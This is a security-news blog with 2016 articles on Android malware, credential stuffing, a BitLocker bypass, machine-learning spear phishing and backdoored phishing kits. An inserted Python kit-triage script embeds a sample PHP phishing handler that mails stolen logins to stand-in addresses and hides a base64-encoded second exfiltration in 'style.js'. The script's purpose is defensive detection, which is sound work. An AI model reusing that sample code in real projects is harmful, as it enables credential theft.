listen more to learn more.

Wednesday, November 30, 2016

"Gooligan" Android Malware Steals Authentication Tokens to Hack User Accounts

"Gooligan" Android Malware Steals Authentication Tokens to Compromise More Than 1 Million Google User Accounts

Researchers from Check Point Software Technologies shared details on Wednesday of new Android malware that has compromised more than a million Google Accounts.

Dubbed Gooligan by the security firm, the malware targets devices running Android 4 and 5, which represent nearly 74 percent of Android devices currently in use.
According to Check Point, the mobile malware can steal authentication tokens stored on devices which can be used to access sensitive data from Gmail, Google Photos, Google Docs and other services, including G Suite.

Check Point’s research team originally discovered Gooligan's code in a malicious app called SnapPea last year. They discovered a new variant in August 2016 which they say is infecting 13,000 Android devices per day, with approximately 57 percent of infected devices located in Asia and about nine percent in Europe.

"The infection begins when a user downloads and installs a Gooligan-infected app on a vulnerable Android device, or by clicking on malicious links in phishing attack messages," Check Point explained in a blog post.

After gaining control over the Android device, the cybercriminals behind Gooligan make money by fraudulently installing apps from Google Play and rating them on behalf of the victim, Check Point said. Gooligan installs at least 30,000 apps daily on compromised devices, totaling more than 2 million apps since the campaign first kicked off.

“If your account has been breached, a clean installation of an operating system on your mobile device is required. This complex process is called flashing, and we recommend powering off your device, and approaching a certified technician or your mobile service provider, to re-flash your device,” said Michael Shaulov, Check Point's head of mobile products.

Check Point has made available a free online tool that allows users to check if their account has been breached by Gooligan. 

In related Android security news, Palo Alto Networks shared details on a recently discovered Android Trojan dubbed “PluginPhantom” that abuses a legitimate plugin framework to update itself and evade static detection. According to the network security firm, PluginPhantom focuses on data theft and is capable of stealing files, contacts, location data and Wi-Fi information, while also being able to take photos, capture screenshots, intercept and send SMS messages, record audio and log keystrokes.

"PluginPhantom" Android Trojan Uses Plugins to Evade Detection

A recently discovered Android Trojan dubbed “PluginPhantom” abuses a legitimate plugin framework to update itself and evade static detection, Palo Alto Networks reported on Wednesday.

PluginPhantom focuses on data theft and it’s capable of stealing files, contacts, location data and Wi-Fi information. The threat can also take photos, capture screenshots, intercept and send SMS messages, record audio and log keystrokes.

PluginPhantom is believed to be a successor of Android.Trojan.Ihide, a piece of malware analyzed by TrustLock in July. However, unlike other Android Trojans and its predecessor, PluginPhantom is based on a type of design architecture where the malicious application is divided into a main host app and multiple plugins.

To achieve this, it uses DroidPlugin, a plugin framework developed by Chinese security firm Qihoo 360. DroidPlugin enables a host application to run multiple plugins without the need to install them. This has allowed PluginPhantom developers to implement various malicious functions in different plugins, which can be loaded and launched by the host app.

PluginPhantom has nine plugins embedded in the host app as asset files. These include three core plugins, designed for command and control (C&C) server communications and updates, and six plugins focusing on data theft.

In addition to the functionality provided by the plugins, the main app includes keylogging capabilities obtained by abusing Accessibility features.

Palo Alto Networks researchers told SecurityWeek that they have no reason to believe the malware has made it onto Google Play, but they don’t have any information on how the threat has been distributed.

There is also no information on who might be targeted, but the security firm pointed out that the location data collected by the malware is translated to coordinate systems used by Baidu Maps and Amap Maps, navigation apps that are highly popular in China.

By hiding the malicious functionality in plugins, the Android Trojan increases its chances of evading static detection mechanisms. PluginPhantom appears to be the first Android Trojan to leverage this method, but experts believe other malware developers may start using it and it’s possible that it will end up replacing the widely used repackaging techniques.

“Since the plugin development pattern is generic and the plugin SDK can be easily embedded, the plugin architecture could be a trend among Android malware in the future,” Palo Alto Networks researchers said.

In related news, researchers from Check Point Software Technologies shared details on Wednesday of new Android malware that has compromised more than a million Google Accounts. Dubbed Gooligan by the security firm, the malware targets devices running Android 4 and 5 and can steal authentication tokens stored on devices which can be used to access sensitive data from Gmail, Google Photos, Google Docs and other services, including G Suite.

Thousands of UK National Lottery Accounts Breached

Camelot, the company that runs the UK National Lottery, announced today that approximately 26,500 customer accounts had been fraudulently accessed. The activity was discovered on Monday.

Camelot claims that "there has been no unauthorized access to core National Lottery systems or any of our databases;" that is, it has not been hacked. Instead it suggests that the attackers used emails and passwords stolen from another online service.

Camelot is also confident that the affected customers cannot directly lose financially from the activity, although some personal information will have been accessed. It adds, "We have taken the measure of suspending the accounts of these players and are in the process of contacting them to help them re-activate their accounts securely." This will undoubtedly lead to increased phishing activity as criminals pretend to be Camelot offering help while actually soliciting further personal information.

The incident demonstrates the need for a responsible partnership between online organizations and users. Both have their part to play. Organizations should require two-factor authentication (and there are now several frictionless biometric options available), while customers should never reuse passwords for any account that holds personal or financial details.

While Camelot is forcing affected customers to change their password, several security experts are suggesting that all Camelot users should do so. While this is good advice, it is not enough. There are certain parallels between this incident and an earlier incident at Tesco Bank less than one month ago.

In both cases it seems as if the attackers timed their activity over a weekend. A similar number of accounts were affected, and in both cases credentials stolen elsewhere were used. The possibility that attackers are automating the extraction of customer details from large stolen databases should not be ignored. If this is the case, then it is not just affected Camelot customers that should change their passwords, but anyone who has reused passwords for more than one account. Needless to say, if a two-factor authentication option is available, it should be adopted.

"There's no doubt that when one database is breached, it's common for the credentials stolen to be tried elsewhere," comments ESET senior research fellow David Harley. "If you were a bad guy, why wouldn’t you try them elsewhere? It can be done manually, of course, but it doesn’t require a lot of effort to automate, either. Which is why I (and many other security commentators) routinely recommend that people don't re-use credentials, at any rate for sites that use and may retain significant data."

The danger, however, is whether these bad guys are able to find common third-party services among the millions of email addresses and passwords at their disposal; that is, if they can find a way of locating Tesco Bank customers, or Camelot customers within the databases. This would not be impossible. Among the stolen credentials there will be many that provide access to the users' actual email accounts.

On Monday of this week, the New York Times published, "How Google Knows When Your Bills Are Due." The answer is simple. "What is probably happening here is that Google is automatically scanning your Gmail messages for notices about package deliveries, flight times, restaurant invitations, and yes — bill reminders — and using the information in smartphone alerts for its Google Now/Google Assistant software."

But anyone with access to an email account can scan the content, looking for whatever they want. "Perhaps the connection between Tesco Bank and Camelot are shared email addresses?" asks F-Secure's Sean Sullivan. "It was thought that credentials (emails/passwords) were brute forced at Tesco. But perhaps some hackers have access to email accounts and know what services are used because of the content in the Inboxes. I would guess that there is crossover between Tesco customers and lottery players."

Given the increasing use of automation by cyber criminals, and the potential for future use of machine learning in their endeavors, we should not dismiss the possibility of further weekend attacks against thousands of customers at individual pre-selected organizations.

Tuesday, November 29, 2016

SHIFT+F10 During Windows 10 Updates Can Bypass BitLocker

Windows has long had a troubleshooting feature that can be used during installs: SHIFT+F10 brings up a command prompt. While this has many advantages, it can be abused. For example, during the more frequent feature updates in Windows 10 (as opposed to the old practice of providing a distinct new OS version), pressing SHIFT+F10 gives the user admin privileges while BitLocker is disabled.

Windows expert Sami Laiho blogged about the issue yesterday. "There is a small but CRAZY bug in the way the 'Feature Update' (previously known as "Upgrade") is installed," he wrote. This includes the troubleshooting feature that allows you to press SHIFT+F10 to get a Command Prompt. "This sadly," he says, "allows for access to the hard disk as during the upgrade Microsoft disables BitLocker."

It is the ability to bypass BitLocker that makes this a serious if not a major issue. The attacker almost certainly needs physical access to the target machine during a relatively short time frame. Nevertheless, "The real issue here is the Elevation of Privilege that takes a non-admin to SYSTEM (the root of Windows) even on a BitLocker (Microsoft's hard disk encryption) protected machine," adds Laiho. "And of course that this doesn't require any external hardware or additional software."

Andy Patel, a security expert with F-Secure, has been considering how this could be used in a live attack. He considered whether a laptop could be stolen, and the system 'tricked' into assuming a feature update. While technically possible, if the attacker has ownership of the laptop, he would probably have easier methods of defeating BitLocker.

Nevertheless, Patel told SecurityWeek, "Microsoft does tend to telegraph the timing of its feature updates." This would give a disgruntled but tech-savvy employee a window in which to obtain elevated access to the system, and do whatever he wishes. "The risk exists," he said, "albeit a difficult one to exploit."

Laiho adds that there is also the risk of an external threat with access to a computer that just "waits for it to start an upgrade to get into the system." He is sufficiently concerned to have advised his customers to use Microsoft's Long Term Servicing Branch (LTSB) for the time being. LTSB, unlike the Current Branch, uses Microsoft's earlier update process rather than the newer, and vulnerable, feature update process. He also advises that companies should not allow unattended updates, and should "Keep very tight watch on the Insiders."

While the SHIFT+F10 feature has existed in earlier versions of Windows, and could also be used to bypass BitLocker on Windows 7 and 8, it is only with the advent of Windows 10's in-place upgrades that it has become a real vulnerability. Laiho himself notes that he used it as long ago as NT, when he pressed SHIFT+F10 so that he could play solitaire while doing a new NT install.

His solution of staying on LTSB, however, has caused some disagreement among admins and others (in the blog comment stream). One suggested, "The LTSB isn't designed for use as a daily driver. Full stop. Users will encounter significant usability issues." He added, "The impact of this issue to any organization must be examined in the context of their threat model. Again: if bad actors have the freedom of access to wait for updates, then your organization has much bigger issues."

Laiho countered that in his travels he had "seen hundreds of computers doing upgrades at airports so I agree there is a bigger problem but I don't see how having a bigger problem would have prevented me from using this to access the machine rather than anything that is harder."

There is a risk here. That cannot be denied. How individual companies respond to that risk will depend on their own risk appetite -- but they should at least be aware of it. Laiho waited until Microsoft Product Groups confirmed to him that they "not only know about this but that they have begun working on a fix." Any company confident that a fix is genuinely coming could use LTSB in the interim, switching back to the Current Branch of updates once the fix is in place.

'Dronejacking' May be the Next Big Cyber Threat

A big rise in drone use is likely to lead to a new wave of "dronejackings" by cybercriminals, security experts warned Tuesday.

A report by Intel's McAfee Labs said hackers are expected to start targeting drones used for deliveries, law enforcement or camera crews, in addition to hobbyists.

"Drones are well on the way to becoming a major tool for shippers, law enforcement agencies, photographers, farmers, the news media, and more," said Intel Security's Bruce Snell, in the company's annual threat report.

Snell said the concept of dronejacking was demonstrated at a security conference last year, where researchers showed how someone could easily take control of a toy drone.

"Although taking over a kid's drone may seem amusing and not that big of an issue, once we look at the increase in drone usage potential problems starts to arise," he said.

The report noted that many consumer drones lack adequate security, which makes it easy for an outside hacker to take control.

Companies like Amazon and UPS are expected to use drones for package deliveries -- becoming potential targets for criminals, the report said.

"Someone looking to 'dronejack' deliveries could find a location with regular drone traffic and wait for the targets to appear," the report said.

"Once a package delivery drone is overhead, the drone could be sent to the ground, allowing the criminal to steal the package."

The researchers said criminals may also look to steal expensive photographic equipment carried by drones, or to knock out surveillance cameras used by law enforcement.

Intel said it expects to see dronejacking "toolkits" traded on "dark web" marketplaces in 2017.

"Once these toolkits start making the rounds, it is just a matter of time before we see stories of hijacked drones showing up in the evening news," the report said.

Other predictions in the report included a decrease in so-called "ransomware" attacks as defenses improve, but a rise in mobile attacks that enable cyber thieves to steal bank account or credit card information.

How Machine Learning Will Help Attackers

Machine Learning Will Improve The Probability of a Successful Attack

Inside McAfee Labs' predictions (PDF) for 2017 is this: criminals will use machine learning to analyze massive quantities of stolen records to identify potential victims and build contextually detailed emails that very effectively target these individuals. In short, just as defenders use machine learning to detect attacks, attackers will use machine learning to automate attacks and evade detection.

SecurityWeek spoke to Intel Security's CTO, Steve Grobman, to learn more. He sees two separate areas in which adversaries will use machine learning (ML). The first "is to use ML techniques to develop strategies to disrupt ML defenses." The second is ML "as a tool to make their attacks more effective -- a good example that we're starting to see already is using ML for the automation of advanced spear phishing."

In the first approach, said Grobman, "Machine learning can be used to analyze defense methods and develop new evasion techniques." For example, "by poisoning the model -- introducing false data so that the good guys' ML defenses will start to classify things incorrectly." 

Another good example, he added, "is a technique called 'raising the noise floor'." In this approach, an adversary will bombard an environment with information that is really false positives, but that look like things that would be detected by various ML detection models.

"If he starts to get a lot of false positives, the defender will need to recalibrate his model to make it less sensitive," Grobman explained. But the false positives fed into the defense can be crafted to be similar to a planned future attack. "Essentially the attacker causes the defender to recalibrate his model so that he doesn't pick up all these falses, and this opens the door to allow the attacker to sneak in," he said.

This type of ML versus ML is already used by Endgame in its red team versus blue team wargames environment. Red teams are attackers; blue teams are defenders. Endgame uses machine learning to simulate both, each learning from the other -- but Grobman sees this spilling out from simulations into real life red team attackers.

His second area of concern involves the use of machine learning to refine social engineering attacks; the danger is that such automation will allow targeted spear phishing at scale -- bulk phishing campaigns with the success rate of targeted attacks.

"In the past," he explained, "you could either do an automated bulk phish with little personalization, or you could do highly targeted spear phish campaigns. In the latter, a human does the analysis from social media, news stories and so on in order to determine the social engineering content for the spear phishing. Machine learning can give you the effectiveness of spear phishing within bulk phishing campaigns; for example, by using ML to scan twitter feeds or other content associated with the user in order to craft a targeted message."

Just as Endgame provides a basic model for ML versus ML, so too there is a model for ML-based social engineering already in the public domain. At Black Hat USA 2016, John Seymour and Philip Tully presented a paper titled "Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter" (PDF).

This paper describes and presents "SNAP_R, a recurrent neural network that learns to tweet phishing posts targeting specific users. The model is trained using spear phishing pentesting data, and in order to make a click-through more likely, it is dynamically seeded with topics extracted from timeline posts of both the target and the users they retweet or follow."

The scary part of SNAP_R is that tests prove it remarkably effective. In tests involving 90 users, the automated spear phishing framework had between a 30% and 60% success rate. Large scale manual spear phishing traditionally has a 45% success rate. Bulk phishing has just a 5% to 14% success rate. But these are early days in the evolution of ML models for social engineering and we can expect rapid improvements over the next couple of years. Machine learning is likely to make targeted spear-phishing more accurate and available in bulk to the adversaries.

Grobman's concern is that criminals will always adopt whatever technologies improve their chance of success. The problem for business, he told SecurityWeek, is that everything is already available: machine learning algorithms and data science tutorials are in the public domain. And the public cloud offers low cost on-demand undetectable compute power to do the number crunching. Machine learning by adversaries is likely to become almost as prolific as machine learning by defenders.

Monday, November 28, 2016

Microsoft's EMET Protects Apps Better Than Windows 10, Researcher Says

While packed with a load of new security features, Windows 10 doesn’t offer some of the additional protections that Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) brings, CERT vulnerability analyst Will Dormann warns.

Released in 2009, EMET was meant to provide mitigation against certain zero-day software vulnerabilities, filling a gap created by the release of major Windows versions 3-4 years after one another.

Although the tool helped interrupt and disrupt many common exploit kits before patches were released, Microsoft now feels that EMET can no longer do its job properly, and says that its lack of integration with the operating system is its main limitation. What’s more, the tech company says that the utility wasn’t created to offer real durable protection over time and that Windows 10 packs all of the necessary protections to render the tool useless.

With that mindset, Microsoft recently announced that EMET will be retired on July 31, 2018, after it pushed back the date following customer feedback. Previously, the company was planning EMET’s retirement for Jan. 27, 2017.

CERT’s Will Dormann, however, claims that Microsoft should keep EMET alive, as this is “still an important tool to help prevent exploitation of vulnerabilities.” According to him, version 5.51 of the tool provides both system-wide protection and application-specific mitigations that continue to make it relevant even on Windows 10 systems.

The application-specific protection offered by EMET makes all the difference, he explains. While both a stock Windows installation and one with EMET properly configured offer about the same level of system-wide mitigations, a Windows installation without EMET is virtually unprotected when application-specific mitigations are considered, as the table to the right shows.

“It is pretty clear that an application running on a stock Windows 10 system does not have the same protections as one running on a Windows 10 system with EMET properly configured. Even a Windows 7 system with EMET configured protects your application more than a stock Windows 10 system,” Dormann says.

According to him, Microsoft’s claim that Windows 10 makes EMET irrelevant is fiction, mainly because it overlooks the primary reason for someone to run the tool: because it can apply all of the available exploit mitigations to all applications. This doesn’t happen through the underlying Windows platform even if the operating system offers support for the mitigation, the researcher explains.

Because developers adopt exploit mitigations at a slow rate, EMET with application-specific mitigations enabled is the only protection available. Even Microsoft doesn’t “compile all of Office 2010 with the /DYNAMICBASE flag to indicate compatibility with ASLR,” meaning that an attacker could work around ASLR to load a non-DYNAMICBASE library into the process space of the vulnerable application and could exploit a memory corruption vulnerability, the researcher explains.

“Microsoft strongly implies that if you are running Windows 10, there is no need for EMET anymore. This implication is not true. The reason it's not true is that Windows 10 does not provide the application-specific mitigations that EMET does,” Dormann notes.

While Windows 10 does provide some exploit mitigations, Dormann explains, applications have to be specifically compiled to take advantage of them. Thus, if an application isn’t built to take advantage of a mitigation, it doesn’t matter whether the underlying operating system supports that mitigation or not.
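The opt-in Dormann describes is visible in the binary itself: the linker records /DYNAMICBASE, /NXCOMPAT and similar choices in the DllCharacteristics field of the PE optional header. The following Python script is an added example (not code from the article, CERT or Microsoft) that reads that field and reports which baseline mitigations an image declared; the flag bit values are from the PE/COFF specification, and the stub header it builds for demonstration is constructed, not a real binary.

```python
"""Report which exploit-mitigation opt-ins a PE image was linked with.

Added example, not code from the article, CERT or Microsoft. The linker
records /DYNAMICBASE (ASLR), /NXCOMPAT (DEP), /GUARD:CF and similar opt-ins in
the DllCharacteristics field of the PE optional header; DYNAMIC_BASE is the
flag the article says parts of Office 2010 and much third-party software lack.
"""
import struct
import sys

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_CHARACTERISTICS = {
    "HIGH_ENTROPY_VA": 0x0020,  # 64-bit ASLR with high-entropy addresses (PE32+)
    "DYNAMIC_BASE": 0x0040,     # /DYNAMICBASE: image may be relocated, so ASLR applies
    "FORCE_INTEGRITY": 0x0080,  # signature must verify at load time
    "NX_COMPAT": 0x0100,        # /NXCOMPAT: image is compatible with DEP
    "NO_SEH": 0x0400,           # image registers no structured exception handlers
    "GUARD_CF": 0x4000,         # /GUARD:CF: Control Flow Guard instrumented
}

# The article's point: the OS can only randomize or protect an image that
# declared compatibility. These two are the baseline opt-ins to check first.
BASELINE = ("DYNAMIC_BASE", "NX_COMPAT")


class PEError(ValueError):
    """Raised when the bytes are not a parseable PE header."""


def dll_characteristics(data: bytes) -> int:
    """Return the 16-bit DllCharacteristics value from a PE header blob."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise PEError("not an MZ/PE executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise PEError("PE signature not found at e_lfanew")
    opt = e_lfanew + 4 + 20  # skip PE signature and the 20-byte COFF file header
    if len(data) < opt + 72:
        raise PEError("truncated optional header")
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise PEError("unknown optional header magic 0x%04x" % magic)
    # DllCharacteristics is at offset 70 of the optional header in both formats:
    # PE32 spends 4 extra bytes on BaseOfData, PE32+ 4 extra on its 8-byte ImageBase.
    (flags,) = struct.unpack_from("<H", data, opt + 70)
    return flags


def mitigation_report(data: bytes) -> dict:
    """Decode the flags and list which baseline mitigations the image lacks."""
    flags = dll_characteristics(data)
    enabled = {name: bool(flags & bit) for name, bit in DLL_CHARACTERISTICS.items()}
    missing = [name for name in BASELINE if not enabled[name]]
    return {"flags": flags, "enabled": enabled, "missing": missing}


def build_stub_pe(flags: int, pe32plus: bool = False) -> bytes:
    """Constructed minimal PE header (not a runnable binary) for demonstration."""
    e_lfanew = 0x40
    mz = bytearray(e_lfanew)
    mz[:2] = b"MZ"
    struct.pack_into("<I", mz, 0x3C, e_lfanew)
    opt_size = 240 if pe32plus else 224
    machine = 0x8664 if pe32plus else 0x014C
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 70, flags)
    return bytes(mz) + b"PE\0\0" + coff + bytes(opt)


def check_file(path: str) -> dict:
    """Report on a real PE file; the headers fit comfortably in the first 8 KiB."""
    with open(path, "rb") as fh:
        return mitigation_report(fh.read(0x2000))


if __name__ == "__main__":
    targets = sys.argv[1:]
    if not targets:
        # No file given: show the two constructed cases, one opted in and one not.
        for label, value in (("opted-in", 0x0140), ("no /DYNAMICBASE", 0x0100)):
            rep = mitigation_report(build_stub_pe(value))
            print(f"{label}: flags=0x{rep['flags']:04x} missing={rep['missing']}")
    for path in targets:
        rep = check_file(path)
        print(f"{path}: missing={rep['missing'] or 'none'}")
```

Run over every module loaded into a process, this is how an analyst finds the non-DYNAMICBASE library the article warns about; EMET's application-specific mitigations are what cover such modules on a stock system.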

The researcher also notes that, while EMET will reach its end-of-life (EOL) on July 31, 2018, the application will likely continue to work as before, only without assistance from Microsoft. Software currently outside of the support window should be tested so that EMET could provide protection against zero-days. Vulnerabilities in products outside of their support cycle become “forever-days,” because they will never be fixed, the researcher also says.

In Dormann’s opinion, both an upgrade to Windows 10 for exploit mitigation and installing EMET with application-specific mitigations configured are recommended actions. Without the utility, system-wide mitigations of DEP and ASLR can be applied, but Windows 10 can’t cover all of the mitigations admins using EMET have come to rely on. The tool, he says, can provide protection against both zero-days in supported software and forever-days in unsupported software.

Saturday, November 26, 2016

Google Warns Users of Recent State-sponsored Attacks

Google Warns Journalists and Activists About Recent State-Sponsored Attacks

Over the last few days, Google has delivered a batch of warnings about potential government-backed attacks against numerous journalists, academics and activists. Many of the recipients have announced their personal warnings on Twitter. There are some differences in the wording of some of the warnings, but Google has confirmed that the Twitter postings appear to be authentic.

Google has been issuing such warnings since 2012. At first they were simple text alerts across the top of the recipients' Gmail page. In March of this year it started to use the larger more noticeable banners that are now appearing. The warnings do not indicate that an account has actually been compromised; only that Google researchers have seen indications of an attempt against the account.

The warnings are also not timely. The attack indicators were likely noticed up to a month earlier. Google does not issue immediate warnings for fear that this will allow attackers to determine the method of discovery. This time lapse has led to certain assumptions that the attackers are likely to be the Russian actors, possibly APT28 or APT29, that were linked to attacks against the Democrats, supposedly to influence the election. (Last month, Russian hackers were also linked with targeting journalists investigating the MH17 crash.)

This, however, has to be conjecture. Google does not publicly provide any evidence on the identity of the attackers -- and at least one target is a Hong-Kong-based Chinese activist (Joshua Wong Chi-fung).

"Google has been secretive about the algorithms and criteria it uses to determine that a potential attack is state-sponsored," explains ESET senior research fellow David Harley, adding that such secrecy about proprietary algorithms is not unusual in the security industry. "The relationship with the APT29 targeted malware is speculative, but I can't say there isn't a connection. If an attack is based on code that is associated with known state-sponsored attacks, that could be another indicator, if you have that sort of information. Google isn't exactly known for a spirit of friendly cooperation with the security industry at large, but it certainly has security resources."

There is, however, an element of hysteria about this current batch of warnings; as if users need to take different precautions against nation attacks than they do against everyday criminal attacks. Activists are more likely to be attacked for political reasons, and in some cases the consequences could be more dire -- but the defenses remain the same as those everybody should be using as a matter of course.

"Journalists and professors already know what they should do - and if they don't, they can easily look it up. If they don't already follow best practices it's because they suffer from the fallacy that they aren't important enough to target," comments F-Secure's Sean Sullivan. It is certainly true that users receiving Google warnings should take immediate steps to confirm the integrity of their account: Google doesn't say the attack was successful, but nor does it say it failed.

Caleb Chen, who works with Private Internet Access, points out that state-sponsored attacks may be more prevalent than is commonly thought. Google says only that it is likely to happen to less than 0.1% of its users. If there are a billion Gmail users, he suggests, those figures mean that up to a million may have seen state-sponsored probing. "As cyber-attacks continue to proliferate, often times across borders, expect reports of this type of probing to rise in the future." 

There is also an irony about warnings being attributed to foreign governments coming at the same time as the US and particularly the UK governments are increasing their own surveillance capabilities. Luis Corrons, technical director at PandaLabs insists there is a difference. "One thing is knowing that governments are harvesting loads of information from everyone, and another thing is an attack targeted at you, so they can compromise your computer and access (steal) all your information, sources, etc."

Nevertheless, Chen reports a 30% spike in VPN sales from the UK in the week in which the IP Bill completed its course through parliament. While standard computer defenses are required to protect accounts, VPNs are now also required to protect communications -- especially those of activists of any persuasion.

Account defenses obviously include strong passwords, 2FA where possible, reputable anti-virus, and an awareness of spear-phishing techniques; but Corrons offers one other piece of advice for journalists and activists: "Ideally have all your sensitive information in a different computer to the one you use for your emails, Internet, etc. Even better if this one is not connected to the Internet."

Backdoored Phishing Templates Advertised on YouTube

Scammers are abusing YouTube as a new way to promote backdoored phishing templates and provide potential buyers with information on how to use the nefarious software, Proofpoint researchers warn.

Because cybercrime is a business, crooks are constantly searching for new means to advertise their products to increase gains. For some, YouTube seemed like a good selling venue, and they decided to promote their kits on this legitimate website.

A search for “paypal scama” returns over 114,000 results, but buyers are in for a surprise, Proofpoint reveals. To be more precise, while the kits work as advertised, they also include a backdoor that automatically sends the phished information back to the author.

Proofpoint security researchers stumbled upon several YouTube videos that linked to phishing kits, templates, or to pages offering more information on these. The videos were created to show what the templates looked like and to instruct potential buyers on how to collect the phished information.

One of these videos, for example, showed an Amazon phishing template meant to replicate the legitimate login page on the web portal. The video’s authors instructed interested parties to contact them via a Facebook page.

When analyzing the code taken from another example of a phishing template that has been downloaded from a link on a similar video, the security researchers found the author’s Gmail address hardcoded in it. Thus, the author would receive the results of the phish each time the kit was used.

The same kit included a secondary email address that was also receiving the stolen information. What the security researchers didn’t manage to figure out was whether the same author included both addresses in the code or someone else added the second one and decided to redistribute the kit.

A PayPal scam analyzed by the researchers revealed that the cybercriminals attempted to avoid suspicion by adding a PHP include for a file called style.js just before the PHP “mail” command is used to send the stolen credentials. The style.js file, however, was found to include more encoded PHP code. The hidden command in the code was also meant to send the phished information to the author.

“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software,” Proofpoint says.

The security researchers say that they found multiple samples where the authors included backdoors that allow them to harvest the phished credentials even after other actors purchased the templates to use them in their own campaigns. The victims of phishing attacks suffer the most, because they have their credentials stolen by multiple actors each time the backdoored kits are used.
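A defender who obtains one of these kits can triage it for exactly the two tells described above: extra hardcoded recipient addresses and an include of a non-PHP file that hides encoded PHP. The following is an added example (not Proofpoint's code or a real kit); the kit source is constructed inline to mirror the described behaviour.

```python
import base64
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]", re.I)
B64_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
MAIL_RE = re.compile(r"\bmail\s*\(")

# Constructed sample kit (hypothetical): a PayPal-style handler that mails the
# phished form fields, plus a "style.js" that is really base64-wrapped PHP.
_HIDDEN = 'mail("author@example.com", "log", $msg);'
SAMPLE_FILES = {
    "paypal.php": r'''<?php
$to = "buyer-of-kit@example.com";
include("style.js");
$msg = "User: " . $_POST['login'] . " Pass: " . $_POST['passwd'];
mail($to, "PayPal Result", $msg);
mail("hidden-author@example.com", "copy", $msg);
header("Location: https://www.paypal.com/signin");
?>''',
    "style.js": '<?php eval(base64_decode("%s")); ?>'
    % base64.b64encode(_HIDDEN.encode()).decode(),
}

def decoded_layers(src):
    """Yield src, then every base64_decode() payload inside it, recursively."""
    yield src
    for blob in B64_RE.findall(src):
        try:
            inner = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        yield from decoded_layers(inner)

def triage_kit(files):
    """files: {filename: source}. Collect every recipient address (including
    ones hidden behind base64), count plain and encoded mail() calls, and flag
    includes of files whose extension says they are not PHP."""
    findings = {"recipients": set(), "suspicious_includes": [],
                "mail_calls": 0, "encoded_mail_calls": 0}
    for name, src in files.items():
        for layer in decoded_layers(src):
            findings["recipients"].update(EMAIL_RE.findall(layer))
            n = len(MAIL_RE.findall(layer))
            findings["mail_calls" if layer is src else "encoded_mail_calls"] += n
        for inc in INCLUDE_RE.findall(src):
            if not inc.lower().endswith((".php", ".inc")):
                findings["suspicious_includes"].append((name, inc))
    return findings
```

Any recipient beyond the one the buyer configured, or a mail() call that only appears after decoding, is the backdoor the article describes.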

Researchers Hijack Tesla Car by Hacking Mobile App

Researchers at Norway-based security firm Promon have demonstrated how thieves with the necessary hacking skills can track and steal Tesla vehicles through the carmaker’s Android application.

In a video released this week, experts showed how they could obtain the targeted user’s credentials and leverage the information to track the vehicle and drive it away. There are several conditions that need to be met for this attack and the victim must be tricked into installing a malicious app on their mobile phone, but the researchers believe their scenario is plausible.

According to Promon, the Tesla mobile app uses HTTP requests and an OAuth token to communicate with the Tesla server. The token is valid for 90 days and it allows users to authenticate without having to enter their username and password every time they launch the app.

The problem is that this token is stored in cleartext in the app’s sandbox folder, allowing a remote attacker with access to the device to steal the data and use it to send specially crafted requests to the server. Once they obtain this token, criminals can use it to locate the car and open its doors. In order to enable the keyless driving feature and actually steal the vehicle, they need to obtain the victim’s username and password as well.

Experts believe this can be achieved by tricking the user into installing a piece of malware that modifies the Tesla app and steals the username and password when the victim enters them in the app. According to researchers, the legitimate Tesla app can be modified using one of the many vulnerabilities affecting Android, such as the issue known as TowelRoot. The TowelRoot exploit, which allows attackers to elevate privileges to root, has been used by an Android malware dubbed Godless.

In order to get the victim to install the malicious app, the attacker can use various methods, including free Wi-Fi hotspots.

“When the Tesla owner connects to the Wi-Fi hotspot and visits a web page, he is redirected to a captive portal that displays an advertisement targeting Tesla owners. In [our] example, an app was advertised that offers the Tesla owner a free meal at the nearby restaurant. When the Tesla owner then clicks on the advertisement, he is redirected to the Google Play store where the malicious app is displayed,” experts said.

While there are multiple conditions that need to be met for the attack to work, researchers pointed out that many devices run vulnerable versions of Android and users are often tricked into installing malware onto their devices.

Promon has not disclosed any technical details about the attack method. The company says it has been working with Tesla on addressing the issues. It’s worth noting that Tesla has a bug bounty program with a maximum payout of $10,000 for each flaw found in its websites, mobile apps and vehicle hardware.

This is not the first time researchers have demonstrated that Tesla cars can be hacked remotely. A few weeks ago, experts at China-based tech company Tencent showed that they could remotely control an unmodified Tesla Model S while it was parked or on the move. Tesla quickly patched the vulnerabilities found by Tencent, but downplayed their severity, claiming that the attack was not fully remote, as suggested in a video released by experts.

SecurityWeek has reached out to Tesla for comment and will update this article if the company responds.

UPDATE. Tesla told SecurityWeek that none of the vulnerabilities used in this attack are specific to the company's products.

"The report and video do not demonstrate any Tesla-specific vulnerabilities," said a Tesla spokesperson. "This demonstration shows what most people intuitively know – if a phone is hacked, the applications on that phone may no longer be secure. The researchers showed that known social engineering techniques could be employed to trick people into installing malware on their Android devices, compromising their entire phone and all apps, which also includes their Tesla app. Tesla recommends users run the latest version of their mobile operating system."

Thursday, November 24, 2016

Wave of "Food Fraud" Reported at UK's Deliveroo Service

BBC Watchdog (a consumer protection television program) is today airing a report on 'food fraud' against the UK-based Deliveroo service. Food is ordered via the Deliveroo iOS or Android apps, and delivered to the customer. It appears, however, that scores of customers have recently been charged for food they didn't order; food that was actually delivered to complete strangers.

